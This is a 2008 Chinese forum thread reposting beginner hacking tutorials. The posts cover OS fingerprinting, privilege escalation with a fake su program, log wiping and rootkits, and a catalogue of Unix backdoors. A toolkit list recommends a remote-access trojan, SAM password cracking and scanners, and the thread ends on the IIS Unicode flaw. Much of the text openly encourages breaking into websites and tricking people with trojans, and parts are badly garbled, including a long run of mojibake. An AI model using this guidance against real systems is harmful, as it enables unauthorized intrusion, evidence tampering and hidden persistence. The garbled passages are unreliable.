5 t x' |/ \; _/ v1 J0 L9 k8 r1 {4 ^
, N" y' k/ C/ r& B! j
  那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5.5或5.5.l。但这样确定操作系统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。
5 c, @: A$ _' {+ Y
还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型和操作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。
8 W0 D2 B7 K9 X9 X5 e( m- L
; X0 r( [$ r# K* H) Q
  另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包,然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包(或者是任何没有ACK 或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度,这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。
- K7 O9 W, w1 ?' O
" D- p$ ^# G- Y, M' l6 K! g% Q5 \
  获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般 TELNET在23端口,FTP在对21端口,WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所***的端口号。在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP服务,可以使用wuftp、proftp, ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻**站。
$ g. K) H; @/ V4 v6 Q, n
) G% b7 K" B4 z
  另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的名称、规模,网络管理员的生活习惯、***号码等。这些信息看起来与攻击一个网站没有关系,实际上很多黑客都是利用了这类信息攻**站的。例如有些网站管理员用自己的***号码做系统密码,如果掌握了该***号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。
1 ~8 F9 ^! i4 L u- a" l# o5 k+ P
  攻击的实施阶段
9 [; r; j/ U! _, v( X4 V
4 t$ m. O, T% e4 N2 H& V* l
  1.获得权限
+ b: o& C$ J3 R! I( I3 Y5 e+ V
' p2 g) h+ Z1 R! E" r2 }
  当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。
' v! C1 E/ c- k
( _ k, d, \: D0 x4 Z+ s5 ]
  能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的 Powered by Apache图样(羽毛状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻击者就是利用了管理员对We erver用数据库的一些不当配置而成功取得最高权限的。
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 14:51:42
黑客初级技术讲解(中)
- I7 [4 Z0 o* ~ w9 g6 H
% L/ d; _7 f6 I: }' j& \! W9 Y; w
  当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。
, S7 Z! G! [2 i0 m1 x. O ^9 a. [" c6 K0 a* M: {
  无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。
( m1 h' D: o$ J
8 H0 `# f* r' M1 T3 Q
  2.权限的扩大
* N% G2 y, n- l5 @3 {5 y, B" S t4 q: Y3 E. e/ f3 w: ]+ |
  系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。
4 w, R2 C* y$ ?/ _
只有获得了最高的管理员权限之后,才可以做诸如网络***、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su 程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su 变成root了。
! E0 h; Q8 m) A+ l
% b7 F8 m: ], S% S# q
  攻击的善后工作
- ^1 r# d/ Q3 U3 z0 R, U
) _. C) {; q7 y/ ]7 l
  1.日志系统简介
7 w! i c7 y: F/ X4 w3 U; W/ H
3 {7 O# A" _" P Z! s* l
  如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化 ~* O! g- ^' }; g' w. k" z
. R( T! |3 x6 O$ @; o1 l1 f
  /usr/adm——早期版本的Unix。
% U. I# B: A; l' [
  /Var/adm新一点的版本使用这个位置。
* ]5 I, f1 E0 |, ^. ^, L2 Q
  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。
1 Y7 k. d; S" _7 \. _
  /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。
$ d- ]+ Z9 P$ J; ^* N6 M* D. d
; d& J/ l; r. n5 \
  下面的文件可能会根据你所在的目录不同而不同:
/ f: u& a4 Z2 s$ e- [( D4 v6 S
# M0 l& X$ b3 o) m8 E. t! k
  acct或pacct-一记录每个用户使用的命令记录。
6 E% Q! J" l! {/ T9 l* x
  acce log主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服务器。
# C: z; t" q( J- z
  aculo保存拨出去的Modems记录。
) M7 t* J3 y0 m: A% D
  lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。
+ X% P1 A I) W# G" K
  loginlog一记录一些不正常的L0gin记录。
& v: M+ `' R5 Y2 ?4 x
  me ages——记录输出到系统控制台的记录,另外的信息由Syslog来生成
/ R! q9 A) l2 U- r. b2 x
  security记录一些使用 UUCP系统企图进入限制范围的事例。
5 c* F k& n* `) C; U
  sulog记录使用su命令的记录。
" o% X7 @5 M" h. l2 M0 i$ R% I
  utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。
2 d6 x: j" A e( a
  Utmpx,utmp的扩展。
9 u5 G$ _( R2 X, h+ [% u9 i1 u/ f
  wtmp记录用户登录和退出事件。
1 b* |, ?/ X" r+ v: x, a
  Syslog最重要的日志文件,使用syslogd守护程序来获得。
0 W, v l; S! Z( O E5 z X& C& \0 U7 f
  2.隐藏踪迹
! h" h; ~7 l7 f
) h6 r x8 q( x5 ?
  攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言),包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last等命令查看日志文件时,隐藏掉此用户的信息。
: v: d$ `$ D% a% u" G# y# V8 `
管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost。
$ ?# c, E. W2 I: W0 k, d
' t* L1 @# @& p$ }
  只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马迹的。例如***了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较常见的有 LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、 、netstat、inetd等等一系列重要的系统程序,当替换了 ls后,就可以隐藏指定的文件,使得管理员在使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。
3 F+ r8 Y X/ D# K8 }/ P4 T
- x% T3 o2 A Z/ C
  3.后门
) e$ v8 k: f, u, e8 I* Y
( |( R: }& e j# j* [3 a5 D
   一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。
5 b" y; w- g4 n5 K$ w& _; e2 V
4 ?% G6 B! ?6 v8 u$ X: ]
  1密码破解后门
4 V% X3 `, J2 {) a1 |! q5 L" y$ K4 W
  这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。
5 B4 L/ x/ ^3 R" q
* s# U* O z2 t& c+ c) h
  2Rhosts + + 后门
$ M0 n6 C* q/ G: _9 C7 p5 l# \" m
  在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入\+ +\,就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力. 许多管理员经常检查 \+ +\,所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名,从而不易被发现。 G/ M4 j. Q5 a4 K- b, v! ^
5 c* |6 A4 z) B! E* h6 P8 G
  3校验和及时间戳后门
# H6 q" Z9 O9 I
  早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依@@时间戳和系统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的,MD5使用的算法目前还没人能骗过。
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 14:52:03
黑客初级技术讲解(下)
0 g7 \* U0 Q3 V2 A
) H- z0 W5 N2 K% U/ }
/ v7 Y% I5 L7 v2 P6 h) |* j( \
  4Login后门
* R5 U# L5 p6 \% h# B6 Z, e
  在Unix里,login程序通常用来对 telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便 用\" trings\命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效5Telnetd后门
% Z& A4 O+ o, N0 |' D
  当用户telnet到系统,***端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验,比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门,当终端设置为\letmein\时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定源端口的连接产 生一个shell。
0 N' g0 s* C! W- f1 q) e( H
& j( B. [" B9 w" w) E
  6服务后门
4 w, i; a% E% O: e
  几乎所有网络服务曾被入侵者作过后门. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。
: `: ]' H' y6 z$ Y \
6 e! C6 M4 V: J$ J# S' p0 ^
  7Cronjob后门
' A% W: q' c0 e
  Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置入后门。
! g' {( G* p: z- K
6 ~2 v; Q# \3 I
  8库后门
) g" q, c0 _( K" R9 D8 Q9 Q
  几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门;象 login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。
$ s( H# ?5 t! U/ Q2 O
) T" N, a, v2 m! I
  9内核后门
; o' ]$ X" K0 c" G
  内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。
0 W0 ^( G# B6 d _9 T- ]3 s, m, A7 y6 |
 10文件系统后门
& J8 k' C7 W4 R9 ^' [ i/ x% \
  入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集, iffer日志, email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补\ls\,\du\,\fsck\以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些\坏扇区\里的文件系统,而它又确实存在。
0 q7 D1 C# R$ y# n, N8 A
) L$ X0 _8 M: y) E; Z5 D& T1 @
  11Boot块后门
8 F3 K. I/ z% l% o+ {/ p
  在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。
% p7 z3 ~4 Z' c: O
. 所以更多的管理员是 用MD5校验和检测这种后门的。
* e: _6 l6 a( y& F: J& x" G
12隐匿进程后门
0 \, ~+ C, }( Y$ u* [' H3 Y
  入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和***程序 ( iffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将 iffer程序改名类似in.syslog再执行,因此当管理员用\" \检查运行进程时,出现 的是标准服务名。可以修改库函数致使 \" \不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是
2 o" x" g/ }, I/ u3 R7 y6 X
. I* l7 D& n0 R5 C( ^5 D
  amod.tar.gz :
/ h5 G! d1 }% |6 E% `* I
网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行,管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP,但也可能是其他类型报文。
# r3 Q2 }0 H, `; |/ x) K! [1 u0 e
) y' [# Y) ^! T; j2 p2 w) o
  14TCP Shell 后门
4 a x; L' d O) T! X/ Q
  入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wra er技术. 这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的.
) c/ s4 D6 w* e4 [0 m8 h
8 V8 F; d" U3 d& J' T) f
  15UDP Shell 后门
3 g7 h; g, m& A2 Z
  管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。
! v# l3 k; v9 c: v
5 i% {$ @, q- n. q" e1 z, m" s
  16ICMP Shell 后门
) S- O$ K: Z& I) i' G3 K4 r# _
  Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的ICMP 包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。
7 i8 O0 [: f& D( J
4 F5 K) M. c" I6 h0 ]. C
  17加密连接
) l5 {, \# ~0 w: O8 g
  管理员可能建立一个 iffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能被判定两台机器间的传输内容了。
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 14:59:43
基础知识(1)
" O4 k1 U. o# F5 X% c( F
" g! ?, @+ L' C) A0 ]: r
# |. o* N3 T* v+ T3 ?
我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。
, h5 t: `' r v5 \) e2 x
0 C5 B0 l- `. o* w$ p' y
第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。
4 l# s+ ? j I5 e
, D8 |% h7 q/ w& Q6 I& W+ U. w* U; d
1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。
* E. Q; Y" \( Q
# N7 ^/ L% m5 F( w r7 r& E! _3 I
2, windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。
7 c: o# {1 V9 ~5 Q( x4 C
/ b9 a& ?. V- e" C
3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)
/ T& u( V* B/ M! G4 L( g) B2 o
) D% T- c5 d$ x
4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)
1 a! t, n* @& U# @& w5 v) W4 P
9 R1 _! s( l+ ~7 y+ R T; {9 q$ n
5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!
8 }2 z1 Z7 q; P' l+ h8 D
6 t" V( I7 I% Z! t2 N9 @
6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!
/ f& X( \& \. R6 J
" w/ c9 B# K/ A* d( e& P 7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!
; T: w/ A6 e6 y2 J7 Z4 e
; Y9 O) E0 ?0 ]( n" N7 d
8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉 (比较理想化)
& | ~* J/ n8 x: D8 p, N5 G ?6 n, D- Q& P/ A4 ]/ e
9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!
: N- y- r* O# ]* o0 p( q+ d
4 r# ?6 u5 X( G! @
10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。
( [. X! ?/ u1 `) t3 S
. ]' e9 l. U9 @3 @; ?7 F
第一节操完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟操,包你会黑简单的站(哎哟!心慌了!)
7 D0 c! l) {& r
4 d( R. I* {1 u/ Y
下一节操我们要介绍如何掌握一台主机的基本信息,期待中……
, x' m% ?& @# }: V1 K' t- i9 y* z
. b' R6 K' b$ _. F0 ?. Y) p3 Y: @
真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做操。
2 `: S7 k( v1 {& P
. h4 Z9 c7 Z! [0 h; s) I
今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。
5 L# d r4 Y3 B) ^+ _) `) J
3 }( T: N0 j9 G( Y7 u
首先我们我们要找一台主机来练手,随便挑吧!
(乱说的)
# ]( R, v# H" J: J; u& ?; `
* o* Z8 \. d# `$ }1 R0 P
第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后,我们应该知道它的ip,很简单,ping它一下就可以了。
1 n( c5 i4 ~% g9 F0 |( b* J
7 l( M! w5 L! k9 I7 q7 O: `4 Y
,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。
4 [; ^" N0 B2 v G; c- b" i' T6 w" F
' R3 t+ b' O$ o) P9 X! X
知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
+ S) r9 O" r( Z' B$ L, }9 O1 \
! K- Q- p+ K [8 z: J8 B
21--ftp 重要哦
) @, T; U9 q1 _
* R" I" h3 H# _/ l+ q2 R
23--telnet 欢呼吧
, g6 [6 q* @& V& m
2 T* |! j3 B4 @3 A( e
25-smtp 尽管重要,但似乎没什么可利用的
2 R' e1 W: R! I/ U4 l$ K
! c. G1 S/ D& N0 I- R
53--domain 同上
6 {+ l, b) |1 G: q, |- m' K
% Y. l& L- w5 P3 }
79--finger 可知道用户信息了
' S5 ^+ g. g% c4 I) i6 }
4 \( Q# l K1 t
80--http 要看网页,没它不行吧
0 H6 `7 {$ Z0 N; m3 `% G( K& L
2 H4 }% h! g j" Y! g
110--pop 收信的
3 H( a( b% G. E+ d
$ U2 j3 i \; l/ G( y- a
139--netbios 共享用的,很有利用价值哦
- {! C3 z) x2 b
1 L4 E v. |0 P2 g+ r3 _6 h
3389--win2000超级终端 呵呵,这个好!
* c8 x4 H O' p: e8 } c( g% s. N8 J7 j" R
其实端口有上千种,这些最最常用
2 {! P9 H% f, j1 Z1 ~5 @( T8 {3 v
2 O+ h6 a" b) o$ s# p
我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)
) r+ s8 e% R% r% z, w. g( A D+ n9 d8 @( x
那么我们该如何应对呢?
! `1 o! p2 \' y2 g$ r) v4 w( v: Q" Q/ }
! J- M. E7 d. F7 n) s4 ] :忘了说一声,顺便扫一下7626,冰河有也说不准哦:)
2 {! Q ` d4 Y2 v& t
# N. ]4 @5 y' U$ c
若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望
5 N' O. e: n/ `/ Z4 v |
5 y: B; m8 e2 B6 H; @
telnet 在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?@蠢赐?芑共皇浅?蹲⒁馕拿饔糜铮海┧姹悴赂觯?砹耍?寥耍????????湵捩摯?湵捩摯???榬獩???椮煤?牦湯灴条?硥整摮?????????????????????????????????敩???????捳湡???????????牢? 牢???????????????????????????????????????????????????????????????????戼? 戼???????????????????????????????????????????????????????湵捩摯??????????痚楮潣敤???????????????
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 15:00:08
基础知识(2)
; h0 ?& W9 X2 |+ {0 B
1 l$ X2 X0 O7 z/ S( T
% T$ z' G; d: A2 k3 S& Z' ~, \
今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。
; p' p% l* Z( ?! R3 E4 c
1 J; r- K! u4 r+ z) r# L" q1 h; I
2000年10月17日中联绿盟发布了以下的安全公告:
2 O, e8 M* i7 i% [
. z, N) O. `' s6 t7 a% ]2 \0 U
微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞
$ e/ ^8 {9 m# {
, j$ O% j9 z- D; Q9 L" I
远程漏洞:是
. r1 T1 `1 D3 H. j* o; E& j2 Y
, Y, G$ y2 m# v! x
本地漏洞:是
0 H6 Y; M$ Z! {4 d) h) Y( k }
1 z5 \' y3 z0 e. u: V! u2 W
发布日期:2000年10月17日
9 x! |: L; [- w. T; e' B; E
) c7 H T3 t7 V
更新日期:2000年10月17日
$ _' i7 Q$ b' @4 c
) x& E4 | l6 i% [1 T- Y5 [
受影响的版本:
+ M1 E& h3 } l4 j2 e0 q$ ]
' L; M& B! C8 a
Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0
8 x3 \8 m; e- E/ C2 x
: x4 k& d7 H8 Y" q& R
这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。
- t4 x, C4 J% {5 I+ y5 E. y% C
